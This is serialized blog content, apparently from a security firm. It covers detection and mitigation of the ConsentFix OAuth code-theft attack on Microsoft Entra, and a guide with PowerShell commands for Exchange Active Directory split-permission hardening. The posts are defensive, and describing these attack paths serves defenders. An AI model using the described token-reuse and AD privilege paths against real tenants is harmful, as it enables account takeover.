Windows. Because browsers cannot establish this secure channel, the authorization code flow initiated in a browser is blocked under token protection policies.",[353,28690,28691],{},"When the policy enforces token protection that requires broker‑managed PoP, the authorization code returned to a browser cannot be redeemed because the browser cannot produce the required broker‑signed proof during the code to token exchange",[353,28693,28694],{},"In this case, attacks with AuthCodeFix will be fully mitigated as long the application can be protected by Token Protection.",[353,28696,28697],{},"As shown in the screenshot below, Token Protection successfully mitigates the redemption of the authorization code flow initiated by the victim through a phishing action.",[353,28699,28700],{},[356,28701],{"alt":28702,"src":28703},"Token Protection successfully mitigates the redemption of the authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-07.png",[5786,28705,28539],{"id":28706},"disadvantage-2",[367,28708,28709,28739,28742,28745],{},[370,28710,28711,28712],{},"Only the following resources are officially supported:\n",[367,28713,28714,28716,28718],{},[370,28715,28658],{},[370,28717,28661],{},[370,28719,28664,28720,28722,28724,28725,13854,28728,28732,28733,28738],{},[2970,28721],{},[2970,28723],{},"\nThe Microsoft Graph API is indirectly covered by the previously mentioned resources and Microsoft Graph PowerShell is listed as a supported client. We were able to verify in our testing that the attack for this scenario will be mitigated. “Windows Azure Service Management API\" is not listed as a supported resource. Both CLI clients (",[374,28726,28634],{"href":28632,"rel":28727},[378],[374,28729,28639],{"href":28730,"rel":28731},"https://learn.microsoft.com/en-us/powershell/azure/authenticate-interactive?view=azps-15.1.0#benefits-of-wam",[378],") support WAM which is a client-side requirement to use Token Protection. Microsoft has been announced ",[374,28734,28737],{"href":28735,"rel":28736},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700",[378],"in a blog post"," to extend token protection capabilities for Azure management scenarios.",[370,28740,28741],{},"Some bugs in Microsoft Graph PowerShell force you to temporarily disable WAM integration",[370,28743,28744],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode. The cloud app targeting will also effect productivity access to Microsoft 365.",[370,28746,28747],{},"Limited scope due to availability on supported platforms and Entra ID–integrated devices.",[629,28749,28751],{"id":28750},"block-further-token-issuance-by-compliant-network-check-or-trusted-network","Block further token issuance by compliant network check or trusted network",[2559,28753,28755,28757,28758,28760,28757,28762,28764,28766],{"className":28754},[28472],[433,28756,28475],{}," Medium",[2970,28759],{},[433,28761,28481],{},[2970,28763],{},[433,28765,28487],{}," Broad\n",[629,28768,28770],{"id":28769},"option-block-access-outside-of-compliant-network-with-global-secure-access","Option: Block access outside of Compliant network with Global Secure Access",[5786,28772,28774],{"id":28773},"pre-requisite","Pre-requisite:",[367,28776,28777,28780,28783,28786],{},[370,28778,28779],{},"Entra ID P1 license",[370,28781,28782],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows, macOS, Androind and iOS platform",[370,28784,28785],{},"Global Secure Access Client on all affected clients and enabled Entra Internet Access for M365 Traffic Profile",[370,28787,28788],{},"Conditional Access Policy to enforce network compliant check should be applied to all cloud apps",[5786,28790,28521],{"id":28791},"benefit-3",[353,28793,28794],{},"Block additional token issuance by enforcing a trusted network check. This mitigation ensures attackers cannot obtain new tokens using the refresh token from the authorization code flow. However, it does not prevent the initial redemption of the authorization code or the issuance of the first access token, which remains valid outside the compliant network because it was originally requested by the victim.",[2179,28796,28797],{},[353,28798,28799],{},"Enforcing GSA with the Compliant Network condition also blocks other Token Replay scenarios and adds additional logs which can be very useful for detections and hunting.",[5786,28801,28539],{"id":28802},"disadvantage-3",[367,28804,28805,28808,28811],{},[370,28806,28807],{},"Only applicable for users and devices with deployed Global Secure Access client",[370,28809,28810],{},"Limited scope due to availability on Entra ID–integrated devices",[370,28812,28813],{},"Enforcing Compliant Networks via CA will need some Exclusions like Intune to avoid chicken-egg-problems. Detailed testing is needed before rollout",[2548,28815,28817],{"id":28816},"hunting-queries","Hunting queries",[353,28819,28820,28821,28824],{},"Once all the prerequisites for token theft mitigations are met - such as deploying the GSA client (including ingestion of ",[3724,28822,28823],{},"NetworkAccessTraffic"," logs) and taking benefit of WAM authentication - we gain additional options for threat hunting and verification.",[629,28826,28828],{"id":28827},"leveraging-gsa-logs-and-wam-authentication-for-hunting-or-verify-confidence-on-detection-results","Leveraging GSA Logs and WAM Authentication for hunting or verify confidence on detection results",[353,28830,28831,28832,28834],{},"This hunting query leverages ",[3724,28833,28823],{}," logs from Global Secure Access (GSA), which include the initiating process for communication with the Microsoft Entra token endpoint. This helps determine whether a token request originated directly from a browser and also whether any additional token requests were made outside the GSA network.",[2179,28836,28837],{},[353,28838,28839],{},"This query works and delivers only reliable results when the prerequisites are met; otherwise, it leads to a high false-positive rate.",[353,28841,28842,28845,28846,28849,28850,28853],{},[433,28843,28844],{},"Why this matters:"," When signing in via CLI or PowerShell modules using Web Account Manager (WAM) on Windows Devices, the flow does not involve a browser-based authorization code. This sign-in behavior is the default in the latest version. Therefore, if the initiating process is a browser executable (e.g., ",[3724,28847,28848],{},"msedge.exe","), this is a strong indicator of suspicious activity. On macOS, the process is initiated by the Company Portal app (",[3724,28851,28852],{},"com.microsoft.CompanyPortalMac.ssoextension",")  when using Platform SSO.",[353,28855,28856,28859],{},[433,28857,28858],{},"Token Binding and PoP:"," WAM authentication typically binds tokens to the device by enforcing Proof-of-Possession (PoP). Attackers cannot issue further bounded tokens without PoP, so an unbounded refresh token is another strong indicator.",[353,28861,28862,28865],{},[433,28863,28864],{},"Limitations:"," All the mentioned signals are only available when the accessing device is registered with or joined to Microsoft Entra ID.",[353,28867,28868,28871],{},[433,28869,28870],{},"Confidence Score Logic:"," The query combines multiple signals to calculate a confidence score:",[367,28873,28874,28877,28880],{},[370,28875,28876],{},"Presence of a browser process initiating token requests.",[370,28878,28879],{},"Detection and down grade to unbounded tokens.",[370,28881,28882],{},"Network provider changes (including Compliant to non-compliant) between sign-ins.",[353,28884,28885],{},"These signals can be used in the query to hunt for activity or to derive a confidence score in the event of an incident based on the previous detection.",[353,28887,28888],{},[356,28889],{"alt":28890,"src":28891},"Signals for the hunting query","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-08.png",[353,28893,28894],{},"The following scoring will be shown depending on the conditions:",[353,28896,28897,28900,28901,28903,28904,28906,28908,28911,28912,28914,28916,28919],{},[433,28898,28899],{},"A very high confidence score"," is displayed when ",[3724,28902,28823],{}," logs indicate a familiar browser process instead of initiating a token request, and a downgrade of an unbound token has been detected.",[2970,28905],{},[2970,28907],{},[433,28909,28910],{},"A high confidence score"," is shown when the sign-in occurs from a different Network Provider (ASN) and a non-compliant network involving unbound tokens.",[2970,28913],{},[2970,28915],{},[433,28917,28918],{},"A medium confidence score"," is shown when only a change in Network Provider and compliant network is identified, along with a change in the token type used.",[353,28921,28922,28923,456],{},"You’ll find the latest version of the hunting query on ",[374,28924,28927],{"href":28925,"rel":28926},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-Authentication/ConsentFix-HuntingConfidenceOnTokenAndNetworkSignals.kusto",[378],"GitHub",[629,28929,28931],{"id":28930},"hunting-for-activities-by-issued-tokens","Hunting for activities by issued tokens",[353,28933,28934,28935,28940,28941,28944,28945,28947,28948,28951],{},"You should consider expanding your investigation beyond sign-in events to include activities performed using tokens issued by the attacker. Our colleague Thomas Naunheim has ",[374,28936,28939],{"href":28937,"rel":28938},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-TokenHunting/MicrosoftCloudActivity.func",[378],"published a KQL function"," called ",[3724,28942,28943],{},"MicrosoftCloudActivity",", which can assist in this extended hunting process. Additionally, the affected ",[3724,28946,28374],{}," can be correlated with suspicious ",[3724,28949,28950],{},"UniqueId"," values identified during previous hunts for deeper analysis.",[353,28953,28954],{},[356,28955],{"alt":28956,"src":28957},"KQL function","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-09.png",[353,28959,28960],{},"In this example, the attacker leveraged the refresh token obtained during the attack to issue an access token for the Microsoft Graph API. This token was then used to maintain persistent access and lateral movement by adding a client secret to an application owned by the victim. The query provides details about the Graph API operation, including the token protection status and whether the operation occurred outside the Global Secure Access network.",[353,28962,28963],{},[356,28964],{"alt":28965,"src":28966},"Graph API operation screenshot","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-10.png",[2548,28968,28970],{"id":28969},"further-reading","Further Reading",[367,28972,28973,28980,28987,28994],{},[370,28974,28975],{},[374,28976,28979],{"href":28977,"rel":28978},"https://pushsecurity.com/blog/consentfix",[378],"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants - PushSecurity",[370,28981,28982],{},[374,28983,28986],{"href":28984,"rel":28985},"https://youtu.be/AAiiIY-Soak",[378],"Hacking Endpoint to Identity (Microsoft 365): \"ConsentFix\" - YouTube",[370,28988,28989],{},[374,28990,28993],{"href":28991,"rel":28992},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[378],"Microsoft identity platform and OAuth 2.0 authorization code flow",[370,28995,28996],{},[374,28997,29000],{"href":28998,"rel":28999},"https://entrascopes.com/?appId=04b07795-8ddb-461a-bbee-02f9e1bf7b46",[378],"Microsoft Azure CLI on entrascpes.com",{"title":402,"searchDepth":403,"depth":403,"links":29002},[29003,29006,29007,29008,29016,29020],{"id":28332,"depth":403,"text":28333,"children":29004},[29005],{"id":28358,"depth":704,"text":28359},{"id":28411,"depth":403,"text":28412},{"id":28427,"depth":403,"text":28428},{"id":28463,"depth":403,"text":28464,"children":29009},[29010,29011,29012,29013,29014,29015],{"id":28467,"depth":704,"text":28468},{"id":28491,"depth":704,"text":28492},{"id":28553,"depth":704,"text":28554},{"id":28590,"depth":704,"text":28591},{"id":28750,"depth":704,"text":28751},{"id":28769,"depth":704,"text":28770},{"id":28816,"depth":403,"text":28817,"children":29017},[29018,29019],{"id":28827,"depth":704,"text":28828},{"id":28930,"depth":704,"text":28931},{"id":28969,"depth":403,"text":28970},{"lang":2183,"seoTitle":29022,"titleClass":7896,"date":29023,"categories":29024,"blogtitlepic":29025,"socialimg":29026,"customExcerpt":29027,"keywords":29028,"hreflang":29029,"scripts":29034,"asideNav":29035,"maxContent":415,"published":415},"ConsentFix: How a New OAuth Attack Bypasses Microsoft Entra Conditional Access","2025-12-31",[1117],"head-consentfix","/heads/head-consentfix.jpg","Just before year's end, ConsentFix emerges: a clever OAuth-based attack that abuses legitimate authentication flows to steal the authorization code, effectively handing attackers the keys to Microsoft Entra. We break down why this works despite Conditional Access, which signals it leaves behind in the logs, and how defenders can detect and stop it before real damage is done.","ConsentFix attack, OAuth authorization code theft, Microsoft Entra OAuth attack, Azure CLI token abuse, Entra ID Conditional Access bypass, authorization code phishing, token replay attack Azure, Proof of Possession tokens, WAM authentication security, Azure sign-in log analysis, detect OAuth attacks Entra, Azure identity threat hunting, Global Secure Access token protection, Microsoft Entra security detection",[29030,29032],{"lang":2183,"href":29031},"/de/posts/2025-12-31-vulnerability-consentfix",{"lang":9114,"href":29033},"/es/posts/2025-12-31-vulnerability-consentfix",{"slick":415,"form":415},{"menuItems":29036},[29037,29039,29041,29043,29045,29047],{"href":29038,"text":28333},"#detection-artifacts",{"href":29040,"text":28412},"#reduce-the-noise",{"href":29042,"text":28428},"#affected-first-party-applications",{"href":29044,"text":28464},"#mitigations-and-protections",{"href":29046,"text":28817},"#hunting-queries",{"href":29048,"text":28970},"#further-reading","/posts/2025-12-31-vulnerability-consentfix",{"title":28237,"description":28243},"posts/2025-12-31-vulnerability-consentfix",[29053,29054,10483],"OAuth 2.0","Microsoft Entra ID","XvJUqR9SZe2cwDgWD9NSLNg9R7zTOjKgxmJFBjxBTX4",{"id":29057,"title":29058,"author":29059,"body":29061,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":415,"layout":407,"meta":29595,"moment":29597,"navigation":415,"path":29619,"seo":29620,"stem":29621,"tags":3,"webcast":406,"__hash__":29622},"content_de/posts/2026-01-27-exchange-active-directory.md","​​​Exchange AD Split Permissions without regrets​",[29060],"​Thorsten Kunzi​",{"type":350,"value":29062,"toc":29578},[29063,29067,29070,29076,29080,29102,29105,29109,29115,29129,29135,29138,29142,29178,29197,29201,29207,29215,29219,29235,29239,29245,29249,29259,29264,29269,29288,29292,29317,29321,29341,29349,29363,29377,29437,29441,29465,29482,29494,29507,29514,29518,29528,29539,29551,29555,29558,29561,29575],[629,29064,29066],{"id":29065},"tldr-what-if-we-remove-the-downsides","TLDR: what if we remove the downsides?",[353,29068,29069],{},"I found a way to re-grant the AD and RBAC permissions where the Exchange user, groups, contacts, etc. reside. This way there is no adoption needed for admins or identity management systems, which in my experience was the blocker for most companies to implement it. And we still get the security benefit against lateral movement and domain compromise.",[353,29071,29072],{},[356,29073],{"alt":29074,"src":29075},"Active Directory","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_1.png",[629,29077,29079],{"id":29078},"its-achieved-in-three-steps","It’s achieved in three steps:",[5026,29081,29082,29092,29097],{},[370,29083,29084,29085,29090],{},"Implement ",[374,29086,29089],{"href":29087,"rel":29088},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions#switch-to-active-directory-split-permissions",[378],"AD split permission model",[2970,29091],{},[370,29093,29094,29095],{},"Grant Exchange servers the lost AD permissions, but only on the relevant OUs",[2970,29096],{},[370,29098,29099,29100],{},"Grant Exchange RBAC to re-enable missing PowerShell cmdlets",[2970,29101],{},[353,29103,29104],{},"All via Microsoft’s guidance, AD ACLs or Exchange RBAC assignments.",[629,29106,29108],{"id":29107},"why-do-we-care-now","Why do we care (now)?",[353,29110,29111,29112,29114],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk to Active Directory takeover. Combined with Exchange being notorious for remote exploits these last few years, it’s time to act!",[2970,29113],{},"\nThe problem originates from privileges granted to the root of a domain that get inherited throughout the domain.",[367,29116,29117,29120,29123,29126],{},[370,29118,29119],{},"modify permissions on users and groups (effectively full access)",[370,29121,29122],{},"modify group members",[370,29124,29125],{},"reset password on users",[370,29127,29128],{},"create/delete users and groups",[353,29130,29131],{},[356,29132],{"alt":29133,"src":29134},"Permissions","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_2.png",[353,29136,29137],{},"Only certain high privileged Tier0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[629,29139,29141],{"id":29140},"prominent-examples","Prominent examples:",[367,29143,29144,29147,29167],{},[370,29145,29146],{},"Entra Connect Sync account when using PWHashSync",[370,29148,29149,29150],{},"Default groups\n",[367,29151,29152,29155,29164],{},[370,29153,29154],{},"Allowed RODC Password Replication Group together with EntraConnect account (If a real Windows RODC exists)",[370,29156,29157,29158,29163],{},"Also see ",[374,29159,29162],{"href":29160,"rel":29161},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta/",[378],"Untrustworthy Trust Builders: Account Operators Replicating Trust Attack (AORTA) - SpecterOps"," showing more paths (Account Operators group is a similar threat)",[370,29165,29166],{},"Emptying Protected Users to create attack vectors by removing protections",[370,29168,29169,29170],{},"Unprotected custom groups or admin/service accounts\n",[367,29171,29172,29175],{},[370,29173,29174],{},"Write permission on GPOs (applying to domain controller)",[370,29176,29177],{},"Managing access to AD backups, backup server, PKI templates, hypervisor, ...",[353,29179,29180,29181,29183,29184,29189,29191,29192],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[2970,29182],{},"\nIt is much better to remove the powerful permissions from the root, which is done by implementing the Active Directory split permissions model. ",[374,29185,29188],{"href":29186,"rel":29187},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions",[378],"Configure Exchange Server for split permissions | Microsoft Learn",[2970,29190],{},"\nAnd Microsoft agrees “…encouraged to implement Active Directory split permissions” ",[374,29193,29196],{"href":29194,"rel":29195},"https://techcommunity.microsoft.com/blog/coreinfrastructureandsecurityblog/active-directory-hardening-series---part-7-%E2%80%93-implementing-least-privilege/4366626",[378],"Active Directory Hardening Series - Part 7 – Implementing Least Privilege | Microsoft Community Hub",[2548,29198,29200],{"id":29199},"but-why-is-no-one-doing-it","But why is no one doing it?",[353,29202,29203,29204,29206],{},"As split permissions weren’t available until Exchange 2010 SP1 everyone had accepted it by then and it seems that security teams did not manage to push successfully once it existed.",[2970,29205],{},"\nAnd it would have forced changes to admin and IDM processes, like creating users or distribution lists in AD first and only afterwards using Exchange to “mail enable” them.",[353,29208,29209,29210,29212],{},"No longer available or working cmdlets:",[2970,29211],{},[3724,29213,29214],{},"Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission ",[629,29216,29218],{"id":29217},"adoption-examples","Adoption examples:",[367,29220,29221,29232],{},[370,29222,29223,29224],{},"New-Mailbox (where Exchange writes to AD) would be:\n",[367,29225,29226,29229],{},[370,29227,29228],{},"New-ADUser (where adm.jdoe writes to AD)",[370,29230,29231],{},"Enable-Mailbox",[370,29233,29234],{},"Add-ADPermission for SendAs rights would have to be done via AD users and computers in the security tab and often requiring additional AD permissions for standard admins.",[2548,29236,29238],{"id":29237},"show-me-this-no-regrets-option","Show me this no-regrets option!",[353,29240,29241,29244],{},[433,29242,29243],{},"Disclaimer",": Please fully read and understand the following links and articles, perform in a test environment first, make sure AD backups are current and recovery practices are established!",[629,29246,29248],{"id":29247},"audit-current-usage","Audit current usage",[353,29250,29251,29254,29256],{},[433,29252,29253],{},"You should first check which of the affected cmdlets are in use on which OUs.",[2970,29255],{},[3724,29257,29258],{},"$CsvPath =\"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[353,29260,29261],{},[3724,29262,29263],{},"$Cmdlets = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[353,29265,29266],{},[3724,29267,29268],{},"Search-AdminAuditLog -ResultSize 99000 -Cmdlets $Cmdlets| select RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($_.CmdletParameters))}},succeeded,error | Export-Csv -Path $CsvPath -Delimiter \";\" -Encoding Unicode -NoTypeInformation",[353,29270,29271,29274,29276,29279,29282,29285],{},[433,29272,29273],{},"Quick Analysis of caller and cmdlets:",[2970,29275],{},[3724,29277,29278],{},"$CSVs=Import-Csv -Path $CsvPath -Delimiter \";\"",[3724,29280,29281],{},"$CSVs|group Caller",[3724,29283,29284],{},"$CSVs|group CmdletName",[3724,29286,29287],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange relevant groups into dedicated OUs.",[629,29289,29291],{"id":29290},"enable-split-permissions-model","Enable split permissions model",[353,29293,29294,29301,29303,29304,29306,29309,29311,1501,29314],{},[433,29295,29296,29297,29300],{},"Follow instructions of “Switch to Active Directory split permissions” in ",[374,29298,29188],{"href":29087,"rel":29299},[378]," (NOT RBAC split permissions)",[2970,29302],{},"\nIn essence it will remove the dangerous permissions of “Exchange Windows Permissions” group and also remove Exchange as group member.",[2970,29305],{},[3724,29307,29308],{},"Setup.exe /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF /PrepareAD /ActiveDirectorySplitPermissions:true",[2970,29310],{},[433,29312,29313],{},"To revert back just use:",[3724,29315,29316],{},"/ActiveDirectorySplitPermissions:false",[629,29318,29320],{"id":29319},"grant-ad-permissions","Grant AD Permissions",[353,29322,29323,29326,29328,29329,29331,29334,29336,29338],{},[433,29324,29325],{},"Create a custom AD group and make Exchange server members.",[2970,29327],{},"\nadjust OU Path first!",[2970,29330],{},[3724,29332,29333],{},"New-ADGroup -Name \"AD_Custom Exchange Split permissions replacement\" -GroupCategory Security -GroupScope DomainLocal -Path \"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\" -Description \"replaces the permissions lost by split permissions on relevant OUs\"",[2970,29335],{},[2970,29337],{},[3724,29339,29340],{},"Add-ADGroupMember \"AD_Custom Exchange Split permissions replacement\" -Members \"Exchange Trusted Subsystem\"",[353,29342,29343,29346,29348],{},[433,29344,29345],{},"reboot Exchange servers for permissions via group to work",[2970,29347],{},"\nI’ve created a script to make delegating the AD permissions easy per use case.",[2179,29350,29351],{},[353,29352,29353,29358,29359,29362],{},[433,29354,29355],{},[748,29356,29357],{},"INFO:"," Without these permissions the Exchange server would receive the error ",[3724,29360,29361],{},"“INSUFF_ACCESS_RIGHTS”"," from AD.",[353,29364,29365,29374,29376],{},[433,29366,29367,29368,29373],{},"Download ",[374,29369,29372],{"href":29370,"rel":29371},"https://github.com/glueckkanja/code-snippets/blob/main/ExchangeADSplitPermission/Add-ExchangeADSplitPermissionOnOU.ps1",[378],"Add-ExchangeADSplitPermissionOnOU.ps1"," from glueckkanja GitHub",[2970,29375],{},"\nIt can grant the following PermissionTypes:",[367,29378,29379,29392,29412,29425],{},[370,29380,29381,29384],{},[433,29382,29383],{},"CreateUserAndContact",[367,29385,29386,29389],{},[370,29387,29388],{},"Create/delete, ResetPassword and WriteAllProperties for Users and Contacts",[370,29390,29391],{},"Exchange cmdlets: New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and the matching Remove-*",[370,29393,29394,29397],{},[433,29395,29396],{},"GroupManage",[367,29398,29399,29402,29405],{},[370,29400,29401],{},"Create/Delete Groups, Modify Member",[370,29403,29404],{},"Exchange cmdlets: New-DistributionGroup, Remove-DistributionGroup, Add-DistributionGroupMember, Update-DistributionGroupMember, Remove-DistributionGroupMember",[370,29406,29407,29408],{},"Additional usecases: user managing DistributionGroups they own via https://",[29409,29410,29411],"on-prem-exchange",{},"/EAC",[370,29413,29414,29417],{},[433,29415,29416],{},"UserSendAs",[367,29418,29419,29422],{},[370,29420,29421],{},"Modfiy AD Permissions on Users",[370,29423,29424],{},"Exchange cmdlet: Add-ADPermission",[370,29426,29427,29430],{},[433,29428,29429],{},"GroupSendAs",[367,29431,29432,29435],{},[370,29433,29434],{},"Modfiy AD Permissions on Groups",[370,29436,29424],{},[629,29438,29440],{"id":29439},"how-to-use-the-script","How to use the script:",[353,29442,29443],{},[3724,29444,29445,1501,29448,1501,29454,1501,29457,1501,29462],{},[3724,29446,29447],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU",[29449,29450,29451],"b",{},[3724,29452,29453],{},"\u003COU>",[3724,29455,29456],{},"-PermissionType",[29449,29458,29459],{},[3724,29460,29461],{},"\u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact>",[3724,29463,29464],{},"-Trustee \"AD_Custom Exchange Split permissions replacement",[353,29466,29467,29468,29470],{},"e.g.",[2970,29469],{},[3724,29471,29472,1501,29475,1501,29479],{},[3724,29473,29474],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[29449,29476,29477],{},[3724,29478,29396],{},[3724,29480,29481],{},"-Trustee \"AD_Custom Exchange Split permissions replacement\"",[353,29483,29484],{},[3724,29485,29486,1501,29488,1501,29492],{},[3724,29487,29474],{},[29449,29489,29490],{},[3724,29491,29429],{},[3724,29493,29481],{},[353,29495,29496],{},[3724,29497,29498,1501,29501,1501,29505],{},[3724,29499,29500],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[29449,29502,29503],{},[3724,29504,29416],{},[3724,29506,29481],{},[353,29508,29509],{},[3724,29510,29511],{},[3724,29512,29513],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType CreateUserAndContact -Trustee \"AD_Custom Exchange Split permissions replacement\"",[629,29515,29517],{"id":29516},"grant-exchange-rbac","Grant Exchange RBAC",[353,29519,29520,29523,29525],{},[433,29521,29522],{},"Re-enable -BypassSecurityGroupManagerCheck parameter for Add-DistributionGroupMember and Remove-DistributionGroupMember cmdlets:",[2970,29524],{},[3724,29526,29527],{},"New-RoleGroup -Name \"SplitPermission Security Group Creation and Membership\" -Roles \"Security Group Creation and Membership\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\" ",[2179,29529,29530],{},[353,29531,29532,1501,29536,29538],{},[433,29533,29534],{},[748,29535,29357],{},[2970,29537],{},"Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[353,29540,29541,29543,29546,29548],{},[2970,29542],{},[433,29544,29545],{},"Re-enable New-Mailbox, New-RemoteMailbox, New-MailContact, Remove-... cmdlets with needed parameters:",[2970,29547],{},[3724,29549,29550],{},"New-RoleGroup -Name \"SplitPermission Mail Recipient Creation\" -Roles \"Mail Recipient Creation\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[2548,29552,29554],{"id":29553},"conclusions","Conclusions",[353,29556,29557],{},"I hope that with this guidance many more will take this important step to secure their Active Directory from compromise via Exchange. I have not yet run into issues when I implemented Exchange AD split permissions model and the adoption from this article at our customers.",[353,29559,29560],{},"I hope Microsoft will implement a native way to achieve this granular OU based approach, instead of the current all or nothing, for it to become widely adopted.",[353,29562,29563,29564,22027,29569,29574],{},"As AD Tiering is dear to my heart: Additionally, please do not logon to Exchange servers with Domain Admin (or any Tier0) accounts but treat them as Tier1 from now on and implement AD Tiering asap.\nAs a first step, I recommend tools like ",[374,29565,29568],{"href":29566,"rel":29567},"https://www.pingcastle.com/",[378],"PingCastle",[374,29570,29573],{"href":29571,"rel":29572},"https://www.semperis.com/purple-knight/",[378],"Purple Knight"," to assess your AD Security and Control Paths.",[10832,29576,29577],{},"\ncode {\n  font-size: inherit\n}\n",{"title":402,"searchDepth":403,"depth":403,"links":29579},[29580,29581,29582,29583,29584,29587,29594],{"id":29065,"depth":704,"text":29066},{"id":29078,"depth":704,"text":29079},{"id":29107,"depth":704,"text":29108},{"id":29140,"depth":704,"text":29141},{"id":29199,"depth":403,"text":29200,"children":29585},[29586],{"id":29217,"depth":704,"text":29218},{"id":29237,"depth":403,"text":29238,"children":29588},[29589,29590,29591,29592,29593],{"id":29247,"depth":704,"text":29248},{"id":29290,"depth":704,"text":29291},{"id":29319,"depth":704,"text":29320},{"id":29439,"depth":704,"text":29440},{"id":29516,"depth":704,"text":29517},{"id":29553,"depth":403,"text":29554},{"lang":2118,"seoTitle":29596,"titleClass":7896,"date":29597,"blogtitlepic":8712,"socialimg":29598,"customExcerpt":29599,"keywords":29600,"hreflang":29601,"scripts":29606,"asideNav":29607,"maxContent":415,"published":406},"Exchange AD Split Permissions: Secure Active Directory with Least Privilege","2026-01-27","/heads/head-vulnerability-management.jpg","On-Premises Exchange Server installations are still prevalent even for organizations that have moved all mailboxes to the cloud. Also, they are still very powerful within Active Directory so most times there is a strong attack path on compromising the whole AD and with that usually much of the corporate IT. Switching to the so called “AD Split permissions” removes the critical permissions and I have engineered a solution that removes it’s downsides that usually prevented the adoption.","Exchange Server, Active Directory, AD split permissions, RBAC, Exchange permissions, AdminSDHolder, least privilege, AD ACL, PowerShell",[29602,29604],{"lang":2118,"href":29603},"/en/posts/2026-01-27-exchange-active-directory",{"lang":9114,"href":29605},"/es/posts/2026-01-27-exchange-active-directory",{"slick":415,"form":415},{"menuItems":29608},[29609,29611,29613,29615,29617],{"href":29610,"text":29066},"#tldr-what-if-we-remove-the-downsides",{"href":29612,"text":29108},"#why-do-we-care-now",{"href":29614,"text":29200},"#but-why-is-no-one-doing-it",{"href":29616,"text":29238},"#show-me-this-no-regrets-option",{"href":29618,"text":29554},"#conclusions","/posts/2026-01-27-exchange-active-directory",{"title":29058,"description":402},"posts/2026-01-27-exchange-active-directory","GIJKs0KoXNlN8lgokuTJTmXqlw1U_NE9Ak6MMaScqf4",{"id":29624,"title":29625,"author":29626,"body":29627,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":30210,"moment":30211,"navigation":415,"path":30230,"seo":30231,"stem":30232,"tags":3,"webcast":406,"__hash__":30233},"content_de/posts/2026-03-01-exchange-ad-split-permissions-hardening.md","Exchange AD Split Permissions without regrets",[78],{"type":350,"value":29628,"toc":30197},[29629,29631,29634,29638,29642,29653,29655,29661,29665,29667,29674,29684,29688,29691,29695,29725,29742,29744,29751,29759,29763,29776,29778,29783,29785,29790,29848,29852,29889,29892,29895,29909,29916,29932,29940,29942,29945,29991,29994,30001,30006,30009,30021,30036,30048,30059,30063,30121,30123,30127,30147,30154,30177,30179,30182,30185,30195],[2548,29630,29066],{"id":29065},[353,29632,29633],{},"I found a way to re-grant AD and RBAC permissions directly where Exchange 